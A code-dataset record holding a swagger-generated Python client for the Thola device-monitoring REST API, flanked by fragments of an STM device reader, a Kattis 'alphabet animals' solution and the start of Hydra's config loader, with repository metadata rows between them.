        if self.id.family == 'f7' and devName[8] == '8':
            devName = devName[:8] + '7'
        deviceDefines = sorted([define for define in familyDefines if define.startswith(devName)])
        # if there is only one define thats the one
        if len(deviceDefines) == 1:
            return deviceDefines[0]
        # now we match for the size-id.
        devNameMatch = devName + 'x{}'.format(self.id.size_id.upper())
        for define in deviceDefines:
            if devNameMatch <= define:
                return define
        # now we match for the pin-id.
        devNameMatch = devName + '{}x'.format(self.id.pin_id.upper())
        for define in deviceDefines:
            if devNameMatch <= define:
                return define
        return None

    def __repr__(self):
        return self.__str__()

    def __str__(self):
        return "STMDeviceReader({}, [\n{}])".format(os.path.basename(self.name), ",\n".join(map(str, self.properties)))
| 34.758
| 138
| 0.619368
|
4a10fea6f0af8be304dba1ce872e281354577f3b
| 39,444
|
py
|
Python
|
thola_client/api/read_api.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | 1
|
2021-12-28T18:53:52.000Z
|
2021-12-28T18:53:52.000Z
|
thola_client/api/read_api.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | null | null | null |
thola_client/api/read_api.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
"""
Thola
REST API for Thola. For more information look at our Github : https://github.com/inexio/thola # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from thola_client.api_client import ApiClient
class ReadApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def hardware_health(self, body, **kwargs): # noqa: E501
"""Reads out hardware health data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.hardware_health(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadHardwareHealthRequest body: Request to process. (required)
:return: ReadHardwareHealthResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.hardware_health_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.hardware_health_with_http_info(body, **kwargs) # noqa: E501
return data
def hardware_health_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out hardware health data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.hardware_health_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadHardwareHealthRequest body: Request to process. (required)
:return: ReadHardwareHealthResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hardware_health" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `hardware_health`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/hardware-health', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadHardwareHealthResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_available_components(self, body, **kwargs): # noqa: E501
"""Returns the available components for the device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_available_components(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadAvailableComponentsRequest body: Request to process. (required)
:return: ReadAvailableComponentsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_available_components_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_available_components_with_http_info(body, **kwargs) # noqa: E501
return data
def read_available_components_with_http_info(self, body, **kwargs): # noqa: E501
"""Returns the available components for the device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_available_components_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadAvailableComponentsRequest body: Request to process. (required)
:return: ReadAvailableComponentsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_available_components" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_available_components`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/available-components', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadAvailableComponentsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_count_interfaces(self, body, **kwargs): # noqa: E501
"""Counts the interfaces of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_count_interfaces(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadCountInterfacesRequest body: Request to process. (required)
:return: ReadCountInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_count_interfaces_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_count_interfaces_with_http_info(body, **kwargs) # noqa: E501
return data
def read_count_interfaces_with_http_info(self, body, **kwargs): # noqa: E501
"""Counts the interfaces of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_count_interfaces_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadCountInterfacesRequest body: Request to process. (required)
:return: ReadCountInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_count_interfaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_count_interfaces`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/count-interfaces', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadCountInterfacesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_cpu_load(self, body, **kwargs): # noqa: E501
"""Read out the CPU load of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cpu_load(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadCPULoadRequest body: Request to process. (required)
:return: ReadCPULoadResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_cpu_load_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_cpu_load_with_http_info(body, **kwargs) # noqa: E501
return data
def read_cpu_load_with_http_info(self, body, **kwargs): # noqa: E501
"""Read out the CPU load of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cpu_load_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadCPULoadRequest body: Request to process. (required)
:return: ReadCPULoadResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_cpu_load" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_cpu_load`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/cpu-load', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadCPULoadResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_disk(self, body, **kwargs): # noqa: E501
"""Reads out disk data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_disk(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadDiskRequest body: Request to process. (required)
:return: ReadDiskResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_disk_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_disk_with_http_info(body, **kwargs) # noqa: E501
return data
def read_disk_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out disk data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_disk_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadDiskRequest body: Request to process. (required)
:return: ReadDiskResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_disk" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_disk`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/disk', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadDiskResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_interfaces(self, body, **kwargs): # noqa: E501
"""Reads out data of the interfaces of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_interfaces(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadInterfacesRequest body: Request to process. (required)
:return: ReadInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_interfaces_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_interfaces_with_http_info(body, **kwargs) # noqa: E501
return data
def read_interfaces_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out data of the interfaces of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_interfaces_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadInterfacesRequest body: Request to process. (required)
:return: ReadInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_interfaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_interfaces`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/interfaces', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadInterfacesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_memory_usage(self, body, **kwargs): # noqa: E501
"""Read out the memory usage of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_memory_usage(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadMemoryUsageRequest body: Request to process. (required)
:return: ReadMemoryUsageResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_memory_usage_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_memory_usage_with_http_info(body, **kwargs) # noqa: E501
return data
def read_memory_usage_with_http_info(self, body, **kwargs): # noqa: E501
"""Read out the memory usage of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_memory_usage_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadMemoryUsageRequest body: Request to process. (required)
:return: ReadMemoryUsageResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_memory_usage" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_memory_usage`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/memory-usage', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadMemoryUsageResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_sbc(self, body, **kwargs): # noqa: E501
"""Reads out SBC data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_sbc(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadSBCRequest body: Request to process. (required)
:return: ReadSBCResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_sbc_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_sbc_with_http_info(body, **kwargs) # noqa: E501
return data
def read_sbc_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out SBC data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_sbc_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadSBCRequest body: Request to process. (required)
:return: ReadSBCResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_sbc" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_sbc`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/sbc', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadSBCResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_server(self, body, **kwargs): # noqa: E501
"""Reads out server data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_server(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadServerRequest body: Request to process. (required)
:return: ReadServerResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_server_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_server_with_http_info(body, **kwargs) # noqa: E501
return data
def read_server_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out server data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_server_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadServerRequest body: Request to process. (required)
:return: ReadServerResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_server" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_server`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/server', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadServerResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_ups(self, body, **kwargs): # noqa: E501
"""Reads out UPS data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_ups(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadUPSRequest body: Request to process. (required)
:return: ReadUPSResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_ups_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_ups_with_http_info(body, **kwargs) # noqa: E501
return data
def read_ups_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out UPS data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_ups_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadUPSRequest body: Request to process. (required)
:return: ReadUPSResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_ups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_ups`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/ups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadUPSResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 39.247761
| 124
| 0.601384
|
4a11000033aba07060ea56b826afb5afeb7f35ef
| 1,136
|
py
|
Python
|
Problems/alphabetanimals.py
|
rikgj/Kattis
|
2e34dee307aef5acea5837732bf9f27f8c548e9c
|
[
"MIT"
] | null | null | null |
Problems/alphabetanimals.py
|
rikgj/Kattis
|
2e34dee307aef5acea5837732bf9f27f8c548e9c
|
[
"MIT"
] | null | null | null |
Problems/alphabetanimals.py
|
rikgj/Kattis
|
2e34dee307aef5acea5837732bf9f27f8c548e9c
|
[
"MIT"
] | null | null | null |
from sys import stdin

# Kattis "Alphabet Animals" input parsing.
# Last letter of the animal just said; the next animal must start with it.
lastletter = stdin.readline().strip()[-1]
# Number of remaining animal names (the names themselves follow on stdin).
numOfAnimals = int(stdin.readline())
animals = [x.strip() for x in stdin.readlines()]
# Last letters already examined as candidate endings (memoized by chooseCan).
lettercomb = []
# How many remaining animals start with each letter of the alphabet.
animals_fl = {c: 0 for c in 'abcdefghijklmnopqrstuvwxyz'}
for a in animals:
    animals_fl[a[0]] += 1
def chooseCan():
    # Pick the next animal to say: it must start with `lastletter`.
    # Returns the name suffixed with '!' when it is a guaranteed winning
    # ("killer") move, a plain candidate name otherwise, or '?' when no
    # animal starting with `lastletter` exists.
    # NOTE(review): reads the module-level `animals`, `lastletter`,
    # `lettercomb` and `animals_fl` globals, and mutates `lettercomb`.
    candidate = '?'
    for animal in animals:
        # a candidate with new potential
        if animal[0] == lastletter and animal[-1] not in lettercomb:
            # add last letter to checked
            last = animal[-1]
            lettercomb.append(last)
            # check if best candidate
            # Killer move: the only animal starting with `last` is (at
            # most) this animal itself — `animal[0].count(last)` is 1 when
            # the animal starts with `last`, else 0 — so the opponent
            # would be left without a valid reply.
            if animals_fl[last] == animal[0].count(last):
                return (animal + '!')
            elif candidate == '?':
                candidate = animal
    return candidate
print(chooseCan())
| 32.457143
| 221
| 0.542254
|
4a110009b5239dd53649d028d95fc19e972e4ca3
| 35,083
|
py
|
Python
|
hydra/_internal/config_loader_impl.py
|
Devabdulakeem/hydra
|
7afee0976f7507c3c1b607ebd129d3408b608fa2
|
[
"MIT"
] | null | null | null |
hydra/_internal/config_loader_impl.py
|
Devabdulakeem/hydra
|
7afee0976f7507c3c1b607ebd129d3408b608fa2
|
[
"MIT"
] | null | null | null |
hydra/_internal/config_loader_impl.py
|
Devabdulakeem/hydra
|
7afee0976f7507c3c1b607ebd129d3408b608fa2
|
[
"MIT"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""
Configuration loader
"""
import copy
import os
import re
import warnings
from collections import defaultdict
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple
from omegaconf import Container, DictConfig, ListConfig, OmegaConf, open_dict
from omegaconf.errors import (
ConfigAttributeError,
ConfigKeyError,
OmegaConfBaseException,
)
from hydra._internal.config_repository import ConfigRepository
from hydra.core.config_loader import ConfigLoader, LoadTrace
from hydra.core.config_search_path import ConfigSearchPath
from hydra.core.object_type import ObjectType
from hydra.core.override_parser.overrides_parser import OverridesParser
from hydra.core.override_parser.types import Override, OverrideType, ValueType
from hydra.core.utils import JobRuntime
from hydra.errors import ConfigCompositionException, MissingConfigException
from hydra.plugins.config_source import ConfigLoadError, ConfigSource
from hydra.types import RunMode
class UnspecifiedMandatoryDefault(Exception):
    """Raised when a mandatory default (a '???' config group) was not specified.

    The offending group name is available as ``config_group``.
    """

    def __init__(self, config_group: str,) -> None:
        # Forward the group name to Exception so str(e)/repr(e) are
        # informative instead of empty.
        super().__init__(config_group)
        self.config_group = config_group
@dataclass
class DefaultElement:
    """One entry of a defaults list: ``group[@package]=name [(optional)]``."""

    config_group: Optional[str]
    config_name: str
    optional: bool = False
    package: Optional[str] = None

    def __repr__(self) -> str:
        """Render in the same form users write in a defaults list."""
        parts = []
        if self.config_group is not None:
            parts.append(self.config_group)
        if self.package is not None:
            parts.append(f"@{self.package}")
        parts.append(f"={self.config_name}")
        if self.optional:
            parts.append(" (optional)")
        return "".join(parts)
@dataclass
class IndexedDefaultElement:
    """A DefaultElement together with its index in the defaults list."""

    idx: int
    default: DefaultElement

    def __repr__(self) -> str:
        """Render as ``#<idx> : <default>``."""
        return "#{} : {}".format(self.idx, self.default)
class ConfigLoaderImpl(ConfigLoader):
"""
Configuration loader
"""
def __init__(
self,
config_search_path: ConfigSearchPath,
default_strict: Optional[bool] = None,
) -> None:
self.default_strict = default_strict
self.all_config_checked: List[LoadTrace] = []
self.config_search_path = config_search_path
